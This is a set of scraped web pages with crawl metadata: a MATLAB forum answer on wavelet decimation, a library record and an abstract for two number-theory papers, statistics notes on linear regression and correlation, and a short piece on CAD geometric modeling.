DWT use a power of two and dwtmode 'per'\ndwtmode('per');\nn = 0:255;\nx = cos(2*pi*7/16*n); % frequency is 7/16 cycles/sample almost at Nyquist\nf = -1/2:1/256:1/2-1/256;\nplot(f,fftshift(abs(fft(x))))\nIf you zoom in, you see the frequency is 7/16 as expected. Now we expect that the wavelet coefficients at level one will map this to approximately 2*(1/2-7/16)\n[A,D] = dwt(x,'sym4');\nfnew = -1/2:1/128:1/2-1/128;\nplot(fnew,fftshift(abs(fft(D))))\nNow the frequency is 1/8 as expected.\nI think this is cover in a lot detail in Don Percival's and Andrew Walden's textbook on wavelets in time series analysis\n\"Wavelet Methods for Time Series Analysis\"." ]
[ null, "https://www.mathworks.com/matlabcentral/answers/uploaded_files/186358/image.jpeg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92826533,"math_prob":0.9464847,"size":1727,"snap":"2020-24-2020-29","text_gpt3_token_len":474,"char_repetition_ratio":0.11201393,"word_repetition_ratio":0.0,"special_character_ratio":0.2866242,"punctuation_ratio":0.10242587,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9916923,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-14T08:05:03Z\",\"WARC-Record-ID\":\"<urn:uuid:471ce88b-0032-4d36-a7cd-08b00e7c9f5b>\",\"Content-Length\":\"127368\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e7af662-9789-4219-89b0-7f1808b969b0>\",\"WARC-Concurrent-To\":\"<urn:uuid:2496175e-b55b-474a-8fdb-eb93441ec79b>\",\"WARC-IP-Address\":\"104.96.236.188\",\"WARC-Target-URI\":\"https://ww2.mathworks.cn/matlabcentral/answers/352695-about-decimation-in-dwt\",\"WARC-Payload-Digest\":\"sha1:Q73ODIY3TPAOQ4VPD4WTNWQHWIJCI37T\",\"WARC-Block-Digest\":\"sha1:QMOKFHDP5GSHWRMXNHOUZC3U4YUZYVQW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657149205.56_warc_CC-MAIN-20200714051924-20200714081924-00273.warc.gz\"}"}
https://catalog.lib.kyushu-u.ac.jp/opac_detail_md/?reqCode=frombib&lang=0&amode=MD100000&opkey=&bibid=11792&start=
[ "## <紀要論文>ON THE SIEGEL-TATUZAWA THEOREM FOR A CLASS OF L-FUNCTIONS\n\n作成者 作成者名 所属機関 所属機関名 Graduate School of Information Engineering, Hiroshima University 広島大学大学院工学研究科情報工学専攻 作成者名 所属機関 所属機関名 Graduate School of Mathematics, Nagoya University 名古屋大学大学院多元数理科学研究科 英語 Faculty of Mathematics, Kyushu University 九州大学大学院数理学研究院 2008-03 62 1 201 215 Version of Record restricted access Kyushu Journal of Mathematics || 62(1) || p201-215 http://www2.math.kyushu-u.ac.jp/~kjm/ Kyushu Journal of Mathematics || 62(1) || p201-215 http://www2.math.kyushu-u.ac.jp/~kjm/ Kyushu Journal of Mathematics || 62(1) || p201-215 http://www2.math.kyushu-u.ac.jp/~kjm/ We consider an effective lower bound of the Siegel-Tatuzawa type for general $L$-functions with three standard assumptions. We further assume three hypotheses in this paper that are essential in dev...eloping our argument.Under these assumptions and hypotheses, we prove a theorem of Siegel-Tatuzawa type for general $L$-functions. In particular, we prove such a theorem for symmetric power $L$-functions under certain assumptions.続きを見る\n\n### 詳細\n\nレコードID 11792 査読有 Siegel's zero Tatuzawa's theorem $L$-function 1340-6116 10.2206/kyushujm.62.201 紀要論文 2009.09.25 2018.02.01" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63171995,"math_prob":0.6316889,"size":575,"snap":"2023-40-2023-50","text_gpt3_token_len":212,"char_repetition_ratio":0.12434326,"word_repetition_ratio":0.040816326,"special_character_ratio":0.27826086,"punctuation_ratio":0.09677419,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95254207,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T11:32:17Z\",\"WARC-Record-ID\":\"<urn:uuid:ed8ab9e3-79a6-4600-ba7c-3253b0d3acf0>\",\"Content-Length\":\"88715\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a2b14016-f4ab-4743-8ebb-a1a8ebab7bcb>\",\"WARC-Concurrent-To\":\"<urn:uuid:f8ce8ddd-3dec-42b6-a523-a32a79000675>\",\"WARC-IP-Address\":\"133.5.128.237\",\"WARC-Target-URI\":\"https://catalog.lib.kyushu-u.ac.jp/opac_detail_md/?reqCode=frombib&lang=0&amode=MD100000&opkey=&bibid=11792&start=\",\"WARC-Payload-Digest\":\"sha1:ZIB4QMX4UTBIFGPDW45XOEPIWRZNAJYJ\",\"WARC-Block-Digest\":\"sha1:AE5IISVXK4AD2OCYYBUB45QNV22USCS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506632.31_warc_CC-MAIN-20230924091344-20230924121344-00129.warc.gz\"}"}
http://www.tomhsiung.com/wordpress/tag/regression-equation/
[ "", null, "The Regression Equation\n\nWhen analyzing data, it is essential to first construct a graph of the data. A scatterplot is a graph of data from two quantitative variables of a population. In a scatterplot, we use horizontal axis for the observations of one variable and a vertical axis for the observations of the other variable. Each pair of observations is then plottted as a point. Note: Data from two quantitative variables of a population are called bivariate quantitative data.\n\nTo measure quantitatively how well a line fits teh data, we first consider the errors, e, made in using the line to predict the y-values of the data points. In general, an error, e, is the signed vertical distance from the line to a data point. To decide which line fits the data better, we first compute the sum of the squared errors. Among all lines, the least-squares criterion is that the line having the smallest sum of squared errors is the one that fits the data best. Or, the least-squares criterion is that the line best fits a set of data points is the one having the smallest possible sum of squared errors.\n\nAlthough the least-squares criterion states the property that the regression line for a set of data points must satify, it does not tell us how to find that line. This task is accomplished by Formula 14.1. In preparation, we introduce some notation that will be used throughout our study of regression and correlation.", null, "Note although we have not used Syy in Formula 14.1, we will use it later.\n\nFor a linear regression y = b0 + b1x, y is the depdendent variable and x is the independent variable. However, in the context of regression analysis, we usually call y the response variable and x the predictor variable or explanatory variable (because it is used to predict or explain the values of the response variable).\n\nExtrapolation\n\nSuppose that a scatterplot indicates a linear relationship between two variables. Then, within the range of the observed values of the predictor variable, we can reasonably use the regression equation to make predictions for the response variable. However, to do so outside the range, which is called extrapolation, may not be reasonable because the linear relationship between the predictor and response variables may not hold there. To help avoid extrapolation, some researchers include the range of the observed values of the predictor variable with the regression equation.\n\nOutliers and Influential Observations\n\nRecall that an outlier is an observation that lies outside the overall pattern of the data. In the context of regression, an outlier is a data point that lies far from the regression line, relative to the other data points. An outlier can sometimes have a significant effect on a regression analysis. Thus, as usual, we need to identify outliers and remove them from the analysis when appropriate – for example, if we find that an outlier is a measurement or recording error.\n\nWe must also watch for influential observations. In regression analysis, an influential observation is a data point whose removal causes the regression equation (and line) to change considerably. A data point separated in the x-direction from the other data points is often an influential observation because the regression line is \"pulled\" toward such a data point without counteraction by other data points. If an influential observation is due to a measurement or recording error, or if for some other reason it clearly does not belong in the data set, it can be removed without further consideration. However, if no explanation for the influential observation is apparent, the decision whether to retain it is often difficult and calls for a judgment by the researcher.\n\nA Warning on the Use of Linear Regression\n\nThe idea behind finding a regression line is based on the assumption that the data points are scattered about a line. Frequently, however, the data points are scattered about a curve instead of a line. One can still compute the values of b0 and b1 to obtain a regression line for these data points. The result, however, will yeild an inappropriate fit by a line, when in fact a curve should be used. Therefore, before finding a regression line for a set of data points, draw a scatterplot. If the data points do not appear to be scattered about a line, do not determine a regression line.\n\nThe Coefficient of Determination\n\nIn general, several methods exist for evaluating the utility of a regression equation for making predictions. One method is to determine the percentage of variation in the observed values of the response variable that is explained by the regression (or predictor variable), as discussed below. To find this percentage, we need to define two measures of variation: 1) the total variation in the observed values of the response variable and 2) the amount of variation in the observed values of the response variable that is explained by the regression.\n\nTo measure the total variation in the observed values of the response variable, we use the sum of squared deviations of the observed values of the response variable from the mean of those values. This measure of variation is called the total sum of squares, SST. Thus, SST = 𝛴(yiy[bar])2. If we divide SST by n – 1, we get the sample variance of the observed values of the response variable. So, SST really is a measure of total variation.\n\nTo measure the amount of variation in the observed values of the response variable that is explained by the regression, we first look at a particular observed value of the response variable, say, corresponding to the data point (xi, yi). The total variation in the observed values of the response variable is based on the deviation of each observed value from the mean value, yiy[bar]. Each such deviation can be decomposed into two parts: the deviation explained by the regression line, y^y[bar], and the remaining unexplained deviation, yiy^. Hence the amount of variation (squared deviation) in observed values of the response variable that is explained by the regression is 𝛴(yi^y[bar])2. This measure of variation is called the regression sum of squares, SSR. Thus, SSR = 𝛴(yi^y[bar])2.\n\nUsing the total sum of squares and the regression sum of squares, we can determine the percentage of variation in the observed values of the response variable that is explained by the regression, namely, SSR / SST. This quantity is called the coefficient of determination and is denoted r2. Thus, r2 = SSR/SST. In a same defintion, the deviation not explained by the regression, yiyi^. The amount of variation (squared deviation) in the observed values of the response variable that is not explained by the regression is 𝛴(yi – yi^)2. This measure of variation is called the error sum of squares, SSE. Thus, SSE = 𝛴(yi – yi^)2.\n\nIn summary, check Definition 14.6", null, "And the coefficient of detrmination, r2, is the proportion of variation in the observed values of the response variable explained by the regression. The coefficient of determination always lies between 0 and 1. A vlaue of r2 near 0 suggests that the regression equation is not very useful for making predictions, whereas a value of r2 near 1 suggests that the regression equation is quite useful for making predictions.\n\nRegression Identity\n\nThe total sum of squares equals the regression sum of squares plus the error sum of squares: SST = SSR + SSE. Because of the regression identity, we can also express the coefficient of determination in terms of the total sum of squares and the error sum of squares: r2 = SSR / SST = (SSTSSE) / SST = 1 – SSE / SST. This formula shows that, when expressed as a percentage, we can also interpret the cofficient of determination as the percentage reduction obtained in the total squared error by using the regression equation instead of the mean, y(bar), to predict the observed values of the response variable.\n\nCorrelation and Causation\n\nTwo variables may have a high correlation without being causally related. On the contrary, we can only infer that the two variables have a strong tendency to increase (or decrease) simultaneously and that one variable is a good predictor of another. Two variables may be strongly correlated because they are both associated with other variables, called lurking variables, that cause the changes in the two variables under consideration.\n\nThe Regression Model; Analysis of Residuals\n\nThe terminology of conditional distributions, means, and standard deviations is used in general for any predictor variable and response variable. In other words, we have the following definitions.", null, "Using the terminology presented in Definition 15.1, we can now state the conditions required for applying inferential methods in regression analuysis.", null, "Note: We refer to the line y = 𝛽0 + 𝛽1x – on which the conditional means of the response variable lie – as the population regression line and to its equation as the population regression equation. Observed that 𝛽0 is the y-intercept of the population regression line and 𝛽1 is its slop. The inferential procedure in regression are robust to moderate violations of Assumptions 1-3 for regression inferences. In other words, the inferential procedures work reasonably well provided the variables under consideration don't violate any of those assumptions too badly.\n\nEstimating the Regression Parameters\n\nSuppose that we are considering two variables, x and y, for which the assumptions for regression inferences are met. Then there are constants 𝛽0, 𝛽1, and 𝜎 so that, for each value x of the predictor variable, the conditional distribution fo the response variable is a normal distribution with mean 𝛽0 + 𝛽1x and standard deviation 𝜎.\n\nBecause the parameters 𝛽0, 𝛽1, and 𝜎 are usually unknown, we must estimate them from sample data. We use the y-intercept and slop of a sample regression line as point estimates of the y-intercept and slop, respectively, of the population regression line; that is, we use b0 to estimate 𝛽0 and we use b1 to estimate 𝛽1. We note that b0 is an unbiased estimator of 𝛽0 and that b1 is an unbiased estimator of 𝛽1.\n\nEquivalently, we use a sample regression line to estimate the unknown population regression line. Of course, a sample regression line ordinarily will not be the same as the population regression line, just as a sample mean generally will not equal the population mean.\n\nThe statistic used to obtain a point estimate for the common conditional standard deviation 𝜎 is called the standard error of the estimate. The standard error of the estimate could be compute by", null, "Analysis of Residuals\n\nNow we discuss how to use sample data to decicde whether we can reasonably presume that the assumptions for regression inferences are met. We concentrate on Assumptions 1-3. The method for checking Assumption 1-3 relies on an analysis of the errors made by using the regression equation to predict the observed values of the response variable, that is, on the differences between the observed and predicted values of the response variable. Each such difference is called a residual, generically denoted e. Thus,\n\nResidual = ei = yiyi^\n\nWe can show that the sum of the residuals is always 0, which, in turn, implies that e(bar) = 0. Consequently, the standard error of the estimate is essentially the same as the standard deviation of the residuals (however, the exact standard deviation of the residuals is obtained by dividing by n – 1 instead of n – 2). Thus, the standard error of the estimate is sometimes called the residual standard deviation.", null, "We can analyze the residuals to decide whether Assumptions 1-3 for regression inferences are met because those assumptions can be translated into conditions on the residuals. To show how, let's consider a sample of data points obtained from two variables that satisfy the assumptions for regression inferences.\n\nIn light of Assumption 1, the data points should be scattered about the (sample) regression line, which means that the residuals should be scattererd about the x-aixs. In light of Assumption 2, the variation of the observed values of the response variable should remain approximately constant from one value of the predictor variable to the next, which means the residuals should fall roughly in a horizontal band. In light of Assumption 3, for each value of the predictor variable, the distribution of the corresponding observed values of the response variable should be approximately bell shaped, which implies that the horizontal band should be centered and symmetric about the x-axis.\n\nFurthermore, considering all four regression assumptions simultaneously, we can regard the residuals as independent observations of a variable having a normal distribution with mean 0 and standard deviation 𝜎. Thus a normal probability plot of the residuals should be roughly linear.", null, "A plot of the residuals against the observed values of the predictor variable, which for brevity we call a residual plot, provides approximately the same information as does a scatterplot of the data points. However, a residual plot makes spotting patterns such as curvature and nonconstant standard deviation easier.\n\nTo illustrate the use of residual plots for regression diagnostics, let's consider the three plots in Figure 15.6. In Figure 15.6 (a), the residuals are scattered about the x-axis (residuals = 0) and fall roughly in a horizontal band, so Assumption 1 and 2 appear to be met. In Figure 15.6 (b) it is suggested that the relation between the variable is curved indicating that Assumption 1 may be violated. In Figure 15.6 (c) it is suggested that the conditional standard deviations increase as x increases, indicating that Assumption 2 may be violated.", null, "Inferences for the Slope of the Population Regression Line\n\nSuppose that the variables x and y satisfy the assumptions for regression inferences. Then, for each value x of the predictor variable, the conditional distribution of the response variable is a normal distribution with mean 𝛽0 + 𝛽1x and standard deviation 𝜎. Of particular interest is whether the slope, 𝛽1, of the population regression line equals 0. If 𝛽1 = 0, then, for each value x of the predictor variable, the conditional distribution of the response variable is a normal distribution having mean 𝛽0 and standard deviation 𝜎. Because x does not appear in either of those two parameters, it is useless as a predictor of y.\n\nOf note, although x alone may not be useful for predicting y, it may be useful in conjunction with another variable or variables. Thus, in this section, when we say that x is not useful for predicting y, we really mean that the regression equation with x as the only predictor variable is not useful for predicting y. Conversely, although x alone may be useful for predicting y, it may not be useful in conjunction with another variable or variables. Thus, in this section, when we say that x is useful for predicting y, we really mean that the regression equation with x as the only predictor variable is useful for predicting y.\n\nWe can decide whether x is useful as a (linear) predictor of y – that is, whether the regression equation has utility – by performing the hypothesis test", null, "We base hypothesis test for 𝛽1 on the statistic b1. From the assumptions for regression inferences, we can show that the sampling distribution of the slop of the regression line is a normal distribution whose mean is the slope, 𝛽1, of the population regression line. More generally, we have Key Fact 15.3.", null, "As a consequence of Key Fact 15.3, the standard variable", null, "has the standard normal distribution. But this variable cannot be used as a basis for the required test statistic because the common conditional standard deviation, 𝜎, is unknown. We therefore replace 𝜎 with its sample estimate Se, the standard error of the estimate. As you might be suspect, the resulting variable has a t-distribution.", null, "In light of Key Fact 15.4, for a hypothesis test with the null hypothesis H0: 𝛽1 = 0, we can use the variable t as the test statistic and obtain the critical values or P-value from the t-table. We call this hypothesis-testing procedure the regression t-test.\n\nConfidence Intervals for the Slop of the Population Regression Line\n\nObtaining an estimate for the slop of the population regression line is worthwhile. We know that a point estimate for 𝛽1 is provided by b1. To determine a confidence-interval estimate for 𝛽1, we apply Key Fact 15.4 to obtain Procedure 15.2, called the regression t-interval procedure.", null, "Estimating and Prediction\n\nIn this section, we examine how a sample regression equation can be used to make two important inferences: 1) Estimate the conditional mean of the response variable corresponding to a particular value of the predictor variable; 2) predict the value of the response variable for a particular value of the predictor variable.", null, "In light of Key Fact 15.5, if we standardize the variable yp^, the resulting variable has the standard normal distribution. However, because the standardized variable contains the unknown parameter 𝜎, it cannot be used as a basis for a confidence-interval formula. Therefore, we replace 𝜎 by its estimate se, the standard error of the estimate. The resulting variable has a t-distribution.", null, "Recalling that 𝛽0 + 𝛽1x is the conditional mean of the response variable corresponding to the value xp of the predictor variable, we can apply Key Fact 15.6 to derivea confidence-interval procedure for means in regression. We call that procedure the conditional mean t-interval procedure.", null, "Prediction Intervals\n\nA primary use of a sample regression equation is to make predictions. Prediction intervals are similar to confidence intervals. The term confidence is usually reserved for interval estimates of parameters. The term prediction is used for interval estimate of variables.", null, "In light of Key Fact 15.7, if we standardize the variable yp – yp^, the resulting variable has the standard normal distribution. However, because the standardized variable contains the unknown parameter 𝜎, it cannot be used as a basis for prediction-interval formula. So we replace 𝜎 by its estimate se, the standard error of the estimate. The resulting variable has a t-distribution.", null, "Using Key Fact 15.8, we can derive a prediction-interval procedure, called the predicted value t-interval procedure.", null, "Inferences in Correlation\n\nFrequently, we want to decide whether two variables are linearly correlated, that is, whether there is a linear relationship between two cariables. In the context of regression, we can make that decision by performing a hypothesis test for the slope of the population regression line. Alternatively, we can perform a hypothesis test for the population linear correlation coefficient, 𝜌. This parameter measures the linear correlation of all possible pairs of observations of two variables in the same way that a sample linear correlation coefficient, r, measures the linear correlation of a sample of pairs. Thus, 𝜌 actually describes the strength of the linear relationship between two variables; r is only an estimate of 𝜌 obtained from sample data.\n\nThe population linear correlation coefficient of two variables x and y always lies between -1 and 1. Values of 𝜌 near -1 or 1 indicate a strong linear relationship between the variables, whereas values of 𝜌 near 0 indicate a weak linear relationship between the variables. As we mentioned, a sample linear correlation coefficient, r, is an estimate of the population linear correlation coefficient, 𝜌. Consequently, we can use r as a basis for performing a hypothesis test for 𝜌.", null, "In light of Key Fact 15.9, for a hypothesis test with the null hypothesis H0: 𝜌 = 0, we use the t-score as the test statistic and obtain the critical values or P-value from the t-table. We call this hypothesis-testing procedure the correlation t-test." ]
[ null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/statistics-denial-statistics-debacles-Malfeasance.jpg", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-10-at-9.18.05-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-14-at-4.40.53-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-3.49.51-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-3.51.45-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-5.45.29-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-9.25.34-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-9.57.10-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-9.58.02-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-10.15.26-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.06.18-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.07.53-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.15.15-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.24.57-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-8.06.33-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-8.30.41-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-8.46.44-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-9.31.56-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-9.45.37-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-9.47.24-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-10.18.09-PM.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8928168,"math_prob":0.9923708,"size":19784,"snap":"2020-10-2020-16","text_gpt3_token_len":4139,"char_repetition_ratio":0.2019717,"word_repetition_ratio":0.16422018,"special_character_ratio":0.19935301,"punctuation_ratio":0.10065466,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99940646,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-25T03:53:00Z\",\"WARC-Record-ID\":\"<urn:uuid:b9650fc3-86a0-4499-89f1-0102711f8b82>\",\"Content-Length\":\"111687\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5190f8e2-4f82-4773-a6c2-65b9bae01056>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a96c69f-1fc8-44eb-b129-fbd6e1f50e6d>\",\"WARC-IP-Address\":\"100.42.56.12\",\"WARC-Target-URI\":\"http://www.tomhsiung.com/wordpress/tag/regression-equation/\",\"WARC-Payload-Digest\":\"sha1:23SUI7ZSMCTMJZ7MLMKE4RIRRKEL7FWH\",\"WARC-Block-Digest\":\"sha1:VGASWKA4JGEZGLSPSAFIWEUL3XIUVK2O\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146004.9_warc_CC-MAIN-20200225014941-20200225044941-00308.warc.gz\"}"}
https://www.brighthubengineering.com/cad-autocad-reviews-tips/19291-applications-of-the-cad-software-what-is-geometric-modeling/
[ "Applications of the CAD Software – What is Geometric Modeling?\n\nWhat is Geometric Modeling?\n\nThere are number of applications of the CAD software, one of the most popular applications being geometric modeling. First of all let us see what is geometric modeling? The computer compatible mathematical description of the geometry of the object is called as geometric modeling. The CAD software allows the mathematical description of the object to be displayed as the image on the monitor of the computer.\n\nSteps for Creating the Geometric Model\n\nThere are three steps in which the designer can create geometric models by using CAD software, these are:\n\n1) Creation of basic geometric objects: In the first step the designer creates basic geometric elements by using commands like points, lines, and circles.\n\n2) Transformations of the elements: In the second step the designer uses commands like achieve scaling, rotation and other related transformations of the geometric elements.\n\n3) Creation of the geometric model: During the final step the designer uses various commands to that cause integration of the objects or elements of the geometric model to form the desired shape.\n\nDuring the process of geometric modeling the computer converts various commands given from within the CAD software into mathematical models, stores them as the files and finally displays them as the image. The geometric models created by the designer can open at any time for reviewing, editing or analysis.\n\nRepresentation of the Geometric Models\n\nOf the various forms of representing the objects in geometric models, the most basic is wire frames. In this form the object is displayed by interconnected lines as shown in the figure below (source: Wikipedia). There are three types of wire frame geometric modeling, these are: 2D, 2.1/2D and 3D. They have been described below:\n\n1) 2D: It stands of two dimensional view and is useful for flat objects.\n\n2) 2.1/2D: It gives views beyond the 2D view and permits viewing of 3D object that has no sidewall details.\n\n3) 3D: The three dimension representation allows complete three-dimensional viewing of the model with highly complex geometry. Solid modeling is the most advanced method of geometric modeling in three dimensions.", null, "Reference\n\nBook: CAD/CAM: Computer Aided Design and Manufacturing by Mikell P. Groover and Emory W. Zimmers\n\nThis post is part of the series: Applications of CAD\n\nThis is the series of articles describing various applications of CAD software like geometric modeling, engineering analysis, FEA, design review and evaluation, drafting etc." ]
[ null, "https://img.bhs4.com/CA/6/CA63CD9E220E488788EA94AEE6FA83704586D596_large.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89341444,"math_prob":0.96995556,"size":2682,"snap":"2019-43-2019-47","text_gpt3_token_len":535,"char_repetition_ratio":0.18595967,"word_repetition_ratio":0.009433962,"special_character_ratio":0.19276659,"punctuation_ratio":0.106694564,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9635453,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-21T03:03:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e27bd727-eae0-436d-b996-2458287cc121>\",\"Content-Length\":\"112273\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e745d345-4cfc-405c-9a85-08be34c815b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:99b29a94-a733-45c0-9b47-090550e0c72b>\",\"WARC-IP-Address\":\"104.28.6.60\",\"WARC-Target-URI\":\"https://www.brighthubengineering.com/cad-autocad-reviews-tips/19291-applications-of-the-cad-software-what-is-geometric-modeling/\",\"WARC-Payload-Digest\":\"sha1:PR2W6NAGL2AIPHTZJR4KY27SLHSIJ3W6\",\"WARC-Block-Digest\":\"sha1:GAYFY3Q64EEFMXKT6E7UH6Z734P4MWXY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987751039.81_warc_CC-MAIN-20191021020335-20191021043835-00063.warc.gz\"}"}
https://ricerca.sns.it/handle/11384/125502
[ "We shall consider sections of a complex elliptic scheme E over an affine base curve B, and study the points of B where the section takes a torsion value. In particular, we shall relate the distribution in B of these points with the canonical height of the section, proving an integral formula involving a measure on B coming from the so-called Betti map of the section. We shall show that this measure is the same one which appears in dynamical issues related to the section. This analysis will also involve the multiplicity with which a torsion value is attained, which is an independent problem. We shall prove finiteness theorems for the points where the multiplicity is higher than expected. Such multiplicity has also a relation with Diophantine Approximation and quasi-integral points on E (over the affine ring of B), and in Sections 5 and 6 of the paper we shall exploit this viewpoint, proving an effective result in the spirit of Siegel’s theorem on integral points.\n\n### On the torsion values for sections of an elliptic scheme\n\n#### Abstract\n\nWe shall consider sections of a complex elliptic scheme E over an affine base curve B, and study the points of B where the section takes a torsion value. In particular, we shall relate the distribution in B of these points with the canonical height of the section, proving an integral formula involving a measure on B coming from the so-called Betti map of the section. We shall show that this measure is the same one which appears in dynamical issues related to the section. This analysis will also involve the multiplicity with which a torsion value is attained, which is an independent problem. We shall prove finiteness theorems for the points where the multiplicity is higher than expected. Such multiplicity has also a relation with Diophantine Approximation and quasi-integral points on E (over the affine ring of B), and in Sections 5 and 6 of the paper we shall exploit this viewpoint, proving an effective result in the spirit of Siegel’s theorem on integral points.\n##### Scheda breve Scheda completa Scheda completa (DC)\n2021\nSettore MAT/03 - Geometria\nFile in questo prodotto:\nFile\n1909.01253.pdf\n\nAccesso chiuso\n\nTipologia: Accepted version (post-print)\nLicenza: Non pubblico\nDimensione 361.06 kB\n10.1515_crelle-2021-0056.pdf\n\nOpen Access dal 29/10/2022\n\nTipologia: Published version\nLicenza: Solo Lettura\nDimensione 534.61 kB\nUtilizza questo identificativo per citare o creare un link a questo documento: `https://hdl.handle.net/11384/125502`\n•", null, "ND\n•", null, "5\n•", null, "4" ]
[ null, "https://ricerca.sns.it/sr/cineca/images/thirdparty/pmc_small.png", null, "https://ricerca.sns.it/sr/cineca/images/thirdparty/scopus_small.png", null, "https://ricerca.sns.it/sr/cineca/images/thirdparty/isi_small.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8574664,"math_prob":0.9473476,"size":2520,"snap":"2023-40-2023-50","text_gpt3_token_len":590,"char_repetition_ratio":0.12321144,"word_repetition_ratio":0.7911548,"special_character_ratio":0.21230158,"punctuation_ratio":0.08154506,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9669456,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-05T05:57:56Z\",\"WARC-Record-ID\":\"<urn:uuid:7c0ba5a4-9ca0-4b35-8b29-a16e3a227d66>\",\"Content-Length\":\"50516\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7298b260-32df-4dfd-9814-707e79a5081f>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac424203-b93a-4426-9730-b5d6d295c65d>\",\"WARC-IP-Address\":\"130.186.29.4\",\"WARC-Target-URI\":\"https://ricerca.sns.it/handle/11384/125502\",\"WARC-Payload-Digest\":\"sha1:QB62H6WE4ETQS4COPLLBYDGIB6RJCQWT\",\"WARC-Block-Digest\":\"sha1:2UAYH4ECQFKAAMR7ZLAQGHGP4VTUCD2H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100545.7_warc_CC-MAIN-20231205041842-20231205071842-00163.warc.gz\"}"}
https://sites.google.com/site/geometry4sage20112012/home/resources/star-lessons/lesson-1-mathematical-thinking
